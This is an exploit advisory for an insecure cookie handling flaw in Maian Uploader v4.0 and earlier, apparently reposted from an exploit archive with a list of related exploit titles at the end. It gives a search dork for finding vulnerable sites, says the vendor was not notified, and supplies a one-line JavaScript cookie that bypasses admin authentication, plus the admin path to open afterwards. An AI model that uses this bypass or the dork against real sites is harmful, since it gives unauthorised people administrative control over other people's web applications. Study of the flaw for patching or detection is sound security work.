-[*] ================================================================================ [*]-
-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by: Maian Uploader v4.0
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie
exists.
and not the content. so we can easyily craft a cookie and look like a admin.
[*] Vulnerability:
javascript:document.cookie = "uploader_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin area.
-[*] ================================================================================ [*]-
-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
【Maian Uploader】相关文章:
★ GeekLog
★ PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability
★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
★ Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
★ Joomla Component DT Register Remote SQL injection Vulnerability
★ Dreampics Builder (page) Remote SQL Injection Vulnerability
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit